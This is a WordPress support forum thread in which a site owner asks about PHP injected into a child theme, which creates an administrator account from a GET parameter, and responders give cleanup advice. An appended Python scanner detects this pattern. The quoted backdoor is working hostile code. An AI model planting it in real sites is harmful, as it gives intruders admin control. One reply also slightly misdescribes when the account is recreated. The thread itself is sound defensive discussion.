Title: Potential database hacking
Last modified: October 10, 2022

---

# Potential database hacking

 *  [sarahjsouris](https://wordpress.org/support/users/sarahjsouris/)
 * (@sarahjsouris)
 * [3 years, 8 months ago](https://wordpress.org/support/topic/potential-database-hacking/)
 * Hello,
 * On Saturday morning we received an email saying that our database has been compromised,
   and threatening to sell it to the highest bidder etc.
 * I would normally think that this is some kind of hoax, except for the fact that
   last week there was an error on the website where the website would not load 
   and there was an error message saying that there was an error in the database –
   there was a link to repair database tables. (Does this sometimes happen with 
   WordPress?)
 * It makes me wonder if maybe the link to repairing database tables was a hack,
   or if the error itself was due to the hackers gaining access to our database.
 * Do you think this could be possible?
 * This morning when I was alerted to this email I started scanning our site for
   Malware and found the following code in our child theme functions.php – which
   seems to be a hack:
 *     ```
       add_action('init', 'hjklmopn');
   
       function hjklmopn() {
       if ( isset( $_GET['doomwpl'] ) ) {
       $userdata = array(
           'user_login' => $_GET['doomwpl'],
           'user_url'   => 'joinme.com',
           'user_pass'  => 'doomwp',
           'role'       => 'administrator'
       );
       $user_id  = wp_insert_user( $userdata );
       if ( !is_wp_error( $user_id ) ) {
           var_dump($userdata, $user_id);
       }
       die();
       }
       }
       ```
   
 * I thought that it sounds like it has retrieved role and password information 
   from users of the website – but do you think it is just administrator accounts?
 * Thanks for your help.
 * As I am not fluent in PHP I am not sure what the malicious code has instructed
   the website to do.
 * The rest of our scanners show that there is no additional malware on the site,
   and it seems that there was a vulnerability in our theme builder, so perhaps 
   that is how they got into functions.php
 * Do you think there are any other ways they could have gotten access to functions.php?
 * Thanks so much!
    Sarah
    -  This topic was modified 3 years, 8 months ago by [Jan Dembowski](https://wordpress.org/support/users/jdembowski/).
      Reason: Moved to Fixing WordPress, this is not a Developing with WordPress
      topic

Viewing 4 replies - 1 through 4 (of 4 total)

 *  [Dinesh Pilani](https://wordpress.org/support/users/dineshpilani05/)
 * (@dineshpilani05)
 * [3 years, 8 months ago](https://wordpress.org/support/topic/potential-database-hacking/#post-16084081)
 * Hi,
    Maybe the hacker has used an outdated plugin vulnerability to get access
   to a function file so that the hacker can add code to create a new user and
   assign it the admin role, so remove the code and ask your hosting provider to scan
   the server. There are many cases where, when you are on shared hosting, your
   site can be hacked.
 * Try to keep up to date with your plugins, themes and WordPress version, reset
   the database password and update it in the wp-config.php file, and also check in the
   database whether any unauthorized user has been created; if so, remove it.
   Or move your files and database to the cloud, because cloud hosting like RDS on
   AWS provides database encryption, and many others provide it.
 * And don’t forget to take a backup of the website files and database on a weekly basis,
   and use a security plugin as well.
    -  This reply was modified 3 years, 8 months ago by [Dinesh Pilani](https://wordpress.org/support/users/dineshpilani05/).
 *  Thread Starter [sarahjsouris](https://wordpress.org/support/users/sarahjsouris/)
 * (@sarahjsouris)
 * [3 years, 8 months ago](https://wordpress.org/support/topic/potential-database-hacking/#post-16084113)
 * Hello [@dineshpilani05](https://wordpress.org/support/users/dineshpilani05/) !
 * Thanks so much for your reply. I appreciate your help.
 * Could you please confirm that the code I posted above would be used to insert
   a user into wp-admin, and not to generate a list of all our users’ data?
 * Do you think that it is possible that this user is hidden? Although I checked
   the database this afternoon – they have not been added as a user in the database.
 * I have updated all the plugins, themes etc. I will definitely stay on top of 
   it!
 * And we do regular backups.
 * Thanks so much!
    Sarah
 *  [Dinesh Pilani](https://wordpress.org/support/users/dineshpilani05/)
 * (@dineshpilani05)
 * [3 years, 8 months ago](https://wordpress.org/support/topic/potential-database-hacking/#post-16084341)
 * This code simply inserts the user into the wp_users table with the name doomwpl
   and assigns it an admin role. The user cannot be hidden, but you should remove
   this code, because if there is a user present in the table of the database and
   you remove it, it will automatically be created when the website loads, so it’s better
   to remove the user, because the hook init runs after WordPress has finished
   loading but before any headers are sent.
 *  [barnez](https://wordpress.org/support/users/pidengmor/)
 * (@pidengmor)
 * [3 years, 8 months ago](https://wordpress.org/support/topic/potential-database-hacking/#post-16086536)
 * > Could you please confirm that the code I posted above would be used to insert
   > a user into wp-admin, and not to generate a list of all our users’ data?
 * Is there a valid reason why this code might have been inserted into the child
   theme?
 * If not:
 * – change all passwords for strong random ones (WP dashboard, cPanel, database)
 * – change the salt keys in wp-config.php to log out all users
 * – audit your plugins for those that are no longer maintained and receiving updates
 * – scan the site with the Wordfence and GOTMLS security plugins
 * – install a security plugin (e.g. NinjaFirewall) that can email a notification
   when a new user is created/plugin or theme uploaded/user logs in etc
 * – take regular off-site backups
    -  This reply was modified 3 years, 8 months ago by [barnez](https://wordpress.org/support/users/pidengmor/).
      Reason: OP already takes regular backups
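
A scanner for the pattern in the snippet from the first post, as an added example that is not part of any reply in this thread: it flags PHP functions that call `wp_insert_user` or `wp_create_user` on request input, and reports whether the body names the administrator role and whether the function is hooked with `add_action`. The Python function names, the constructed sample file and the naive brace matching (braces inside strings are not handled) are assumptions of this example.

```python
import re
from pathlib import Path

# Constructed sample file: a benign hook plus the snippet from the first post (shortened).
SAMPLE = r"""<?php
add_action('wp_enqueue_scripts', 'child_styles');
function child_styles() { wp_enqueue_style('child', get_stylesheet_uri()); }
add_action('init', 'hjklmopn');
function hjklmopn() {
if ( isset( $_GET['doomwpl'] ) ) {
$userdata = array(
    'user_login' => $_GET['doomwpl'],
    'user_pass'  => 'doomwp',
    'role'       => 'administrator'
);
$user_id  = wp_insert_user( $userdata );
die();
}
}
"""

FUNC_RE = re.compile(r"function\s+(\w+)\s*\([^)]*\)\s*\{")
REQUEST_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
CREATE_RE = re.compile(r"\bwp_(insert|create)_user\s*\(")
ADMIN_RE = re.compile(r"['\"]administrator['\"]")

def function_bodies(src):
    """Yield (name, body) for each PHP function, matching braces naively."""
    for m in FUNC_RE.finditer(src):
        depth, i = 1, m.end()
        while i < len(src) and depth:
            depth += {"{": 1, "}": -1}.get(src[i], 0)
            i += 1
        yield m.group(1), src[m.end():i]

def suspicious_functions(src):
    """Return (name, names_admin_role, is_hooked) for user creation fed by request input."""
    hits = []
    for name, body in function_bodies(src):
        if CREATE_RE.search(body) and REQUEST_RE.search(body):
            hook = re.search(r"add_action\s*\([^)]*['\"]%s['\"]" % re.escape(name), src)
            hits.append((name, bool(ADMIN_RE.search(body)), bool(hook)))
    return hits

def scan_tree(root):
    """Scan every .php file under root, e.g. a copy of wp-content/themes."""
    return {str(p): h for p in Path(root).rglob("*.php")
            if (h := suspicious_functions(p.read_text(errors="replace")))}
```

Run `scan_tree()` against an offline copy of the theme and plugin directories; a hit is a prompt for manual review, not proof of compromise.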


The topic ‘Potential database hacking’ is closed to new replies.

## Tags

 * [database](https://wordpress.org/support/topic-tag/database/)
 * [hacking](https://wordpress.org/support/topic-tag/hacking/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 4 replies
 * 3 participants
 * Last reply from: [barnez](https://wordpress.org/support/users/pidengmor/)
 * Last activity: [3 years, 8 months ago](https://wordpress.org/support/topic/potential-database-hacking/#post-16086536)
 * Status: not resolved

